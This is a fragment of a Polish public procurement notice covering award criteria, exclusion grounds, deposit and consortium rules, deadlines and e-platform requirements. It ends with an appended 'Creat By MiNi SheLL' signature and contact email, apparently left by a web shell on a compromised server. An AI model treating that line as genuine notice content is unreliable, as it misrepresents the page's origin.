<h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Nie dotyczy – Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie braku podstaw wykluczenia.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Nie dotyczy - Zamawiający nie będzie żądał podmiotowych środków dowodowych na potwierdzenie spełnienia warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy – Zamawiający nie będzie żądał przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Numeracja przeniesiona z SWZ.<br/>7.1.	Oświadczenia i dokumenty wymagane przez Zamawiającego do złożenia przez każdego Wykonawcę wraz z ofertą:<br/>7.1.1.	aktualne na dzień składania ofert oświadczenie Wykonawcy o niepodleganiu wykluczeniu, które stanowi dowód tymczasowo zastępujący wymagane przez zamawiającego podmiotowe środki dowodowe, o treści zgodnej z określoną we wzorze stanowiącym załącznik nr 1 do SWZ;<br/>7.1.2.	dokument zawierający dane aktualne na dzień składania ofert potwierdzający, że oferta została podpisana przez osobę upoważnioną do reprezentowania Wykonawcy, w przypadku, gdy oferta została podpisana przez inną osobę niż umocowana w dokumencie rejestrowym Wykonawcy (np. pełnomocnictwo, umowa spółki cywilnej).<br/><br/>11.5.	Oferta powinna składać się z:<br/>11.5.1.	wypełnionego Formularza elektronicznego dostępnego i generowanego poprzez Platformę;<br/>11.5.2.	wypełnionego Formularza „A” – wg wzoru określonego w Części III SWZ;<br/>11.5.3.	w przypadku, gdy oferta zawiera tajemnicę przedsiębiorstwa – dowodów, o których mowa w pkt. 11.8.3. SWZ;<br/>11.5.4.	oryginału wadium – zgodnie z zapisami pkt. 10.3. SWZ;<br/>11.5.5.	oświadczeń i dokumentów wymienionych w pkt. 7.1. SWZ. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Numeracja przeniesiona z SWZ.<br/>10.	Wadium przetargowe<br/>10.1.	Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie: 8 390,00 zł.<br/>10.2.	Wadium może być wnoszone w następujących formach:<br/>10.2.1.	pieniądzu;<br/>10.2.2.	gwarancjach bankowych;<br/>10.2.3.	gwarancjach ubezpieczeniowych;<br/>10.2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 <br/>pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r., poz. 299). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Numeracja przeniesiona z SWZ.<br/>9.	Oferta wspólna<br/>9.1.	Wykonawcy ubiegający się wspólnie o udzielenie zamówienia (konsorcja i spółki cywilne) ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>9.2.	Oryginał pełnomocnictwa opatrzony kwalifikowanym podpisem elektronicznym, podpisem zaufanym, podpisem osobistym lub kopia potwierdzona notarialnie opatrzona kwalifikowanym podpisem elektronicznym notariusza powinien być załączony do oferty i zawierać w szczególności wskazanie postępowania, którego dotyczy i zakresu umocowania pełnomocnika. <br/>9.3.	Podpisy na pełnomocnictwie muszą być złożone przez osoby uprawnione <br/>do składania oświadczeń woli wymienione we właściwym rejestrze lub ewidencji Wykonawców. W przypadku, gdy upoważnienie osób podpisujących pełnomocnictwa nie wynika z innych dokumentów złożonych wraz z ofertą Wykonawca udowodni upoważnienie tych osób w szczególności przedstawiając stosowne pełnomocnictwa. Dokument pełnomocnictwa winien zostać złożony <br/>w sposób określony w pkt. 11 SWZ. <br/>9.4.	W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne/konsorcja), żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w art. 108 ust. 1 ustawy i 109 ust 1 pkt 1,4 ustawy.<br/>9.5.	Każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy członek konsorcjum/wspólnik spółki cywilnej) składających ofertę wspólną musi wykazać brak podstaw do wykluczenia, o których mowa w art. 108 <br/>ust. 1 ustawy i 109 ust 1 pkt 1,4 ustawy, w tym celu każdy z członków konsorcjum/ wspólnik spółki cywilnej wypełnia oświadczenie – wg wzoru określonego w załączniku nr 1 do SWZ. <br/>9.6.	Oświadczenia lub formularze sporządzone zgodnie z załączonymi do SWZ wzorami, <br/>składa i podpisuje w imieniu wszystkich Wykonawców Pełnomocnik lub wszyscy Wykonawcy wpisując w miejscu przeznaczonym na podanie nazwy i adresu Wykonawcy, nazwy i adresy wszystkich Wykonawców składających ofertę wspólną.<br/>9.7.	Oświadczenie, o którym mowa w pkt. 7.1.1. SWZ każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia (każdy uczestnik konsorcjum oraz wspólnik spółki cywilnej) składa indywidualnie.<br/>9.8.	Poświadczenia za zgodność z oryginałem dokonują wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego, w zakresie dokumentów, które każdego z nich dotyczą. Podpis i poświadczenie za zgodność z oryginałem muszą być złożone za pomocą kwalifikowanego podpisu elektronicznego, podpisu zaufanego lub podpisu osobistego. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający dopuszcza możliwość dokonywania zmian umowy, zgodnie z art. 455 ust. 1 i 2 ustawy, wszelkich zmian dopuszczalnych z mocy prawa i nie wymagających ich przewidzenia w SWZ, a także zmian, których zakres, charakter i warunki wprowadzenia przewidziano we wzorze umowy – Części V SWZ – Projektowane postanowienia umowy. Zmiany w umowie mogą być dokonywane w przypadkach określonych we wzorze umowy – Części V SWZ – Projektowane postanowienia umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-18 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://mpowarszawa.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-18 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-02-16</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Uwaga! Ciąg dalszy z Sekcji III pkt 3.6.) Numeracja przeniesiona z SWZ.<br/>5.4.6.Szczegółowe info. dot. korzystania z Platformy (dalej: &#34;PZ&#34;), proces zakładania konta i logowania się zostały zawarte w instrukcji udostępnionej przez Zamawiającego (dalej: &#34;Zam.&#34;) na PZ w zakładce: „Regulacje i procedury procesu zakupowego”.<br/>5.5.W celu bezproblemowej pracy z PZ, Wykonawca (dalej: &#34;Wyk.&#34;) powinien posiadać co najmniej:<br/>5.5.1.stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>5.5.2.komputer klasy PC lub MAC, o następującej konfiguracji oraz uprawnienia <br/>do instalacji oprogramowania potrzebnego do obsługi podpisu elektronicznego: pamięć min 2GB Ram, procesor Intel IV 2GHZ, jeden z systemów operacyjnych – MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>5.5.3.włączoną obsługę JavaScript;<br/>5.5.4.zainstalowany program AcrobatReader lub inny obsługujący pliki w formacie .pdf.;<br/>5.5.5.zainstalowaną przeglądarkę internetową obsługującą TLS 1.2, najlepiej <br/>w najnowszej wersji - Mozilla FireFox, Google Chrome, Internet Explorer, Safari, Microsoft Edge w przypadku Internet Explorer min. wersja 10.0. W przypadku konieczności złożenia podpisu Przeglądarka Microsoft Edge jest nierekomendowana, ze względu na ograniczenia techn. ze złożeniem podpisu elektronicznego występujące, dla tej przeglądarki.<br/>5.6.W przypadku problemów techn. dot. pracy PZ można się kontaktować z serwisem dostępnym codziennie od pon. do pt. (z wyłączeniem dni ustawowo wolnych od pracy) w godz. od 9:00 do 17:00 pod:<br/>-nr tel.: +48 (22) 257-22-23,<br/>-adresem e-mail: oneplace@marketplanet.pl. <br/>5.7.Dopuszczalny format kwalifikowanego podpisu elektronicznego:<br/>-dok. w formacie „pdf” zaleca się podpisywać formatem PAdES,<br/>-dok. w formacie innym niż „pdf” zaleca się podpisywać formatem XAdES,<br/>-jeżeli w wyniku podpisywania kwalifikowanym podpisem elektronicznym pliku w formacie innym niż „pdf&#34; zostanie utworzony dodatkowy plik z podpisem, Wyk. jest zobowiązany przekazać Zam. oba pliki (plik podpisywany i plik z podpisem),<br/>-Zam. zaleca, aby kwalifikowany podpis elektroniczny, którym posługuje się Wyk. był podpisem wydanym na terenie RP, bądź innych krajów należących do UE.<br/>5.8.Dopuszczalny format podpisu osobistego:<br/>−dok. w formacie „pdf” lub „xml” zaleca się podpisywać podpisem wewnętrznym (otoczonym),<br/>−dok. w formacie innym niż „pdf” zaleca się podpisywać podpisem zewnętrznym lub otaczającym.<br/>5.9.Dopuszczalny format podpisu zaufanego:<br/>−wielkość dok. nie może przekraczać 10 MB, dostępny format podpisu „xml”.<br/>5.10.Obsługiwane przez PZ formaty przesyłanych danych tj. plików o wielkości do 100 MB w formatach: txt, rtf, pdf, xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg, wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd, gml, rng, xsl, xslt, TSL, XMLsig, XAdES, PAdES, CAdES, ASIC, XMLenc, ath i prd.<br/>5.11.Informacje na temat kodowania i czasu odbioru danych:<br/>5.11.1.Oferta Wyk. (każdy plik załączony i zapisany przez Wyk. <br/>na PZ w ramach oferty), widoczna jest w Systemie jako zaszyfrowana. Możliwość otworzenia plików dostępna jest dopiero po automatycznym odszyfrowaniu oferty przez Zam. po upływie terminu składania ofert.<br/>5.11.2.Oznaczenie czasu odbioru danych przez PZ stanowi przypiętą <br/>do dok. elektronicznego datę oraz dokładny czas (hh:mm:ss), znajdującą się po lewej stronie dok. w kolumnie „Data” - czas lokalny serwera synchronizowany odpowiednim źródłem czasu.<br/>5.11.3.Format kodowania treści w obrębie platformy - UTF8.<br/>5.11.4.Cała komunikacja pomiędzy użytkownikiem Systemu a serwerem jest wykonywana przy użyciu bezpiecznego protokołu HTTPS (szyfrowanie TLS).<br/>5.11.5.Za datę wpływu oświadczeń, wniosków, zawiadomień oraz informacji przyjmuje się datę ich wczytania na PZ Zam. Oświadczenia, wnioski, zawiadomienia i informacje, które wpłyną do Zam., uważa się za złożone w terminie, jeśli ich czytelna treść dotrze do Zam. przed upływem tego terminu.

Creat By MiNi SheLL
Email: jattceo@gmail.com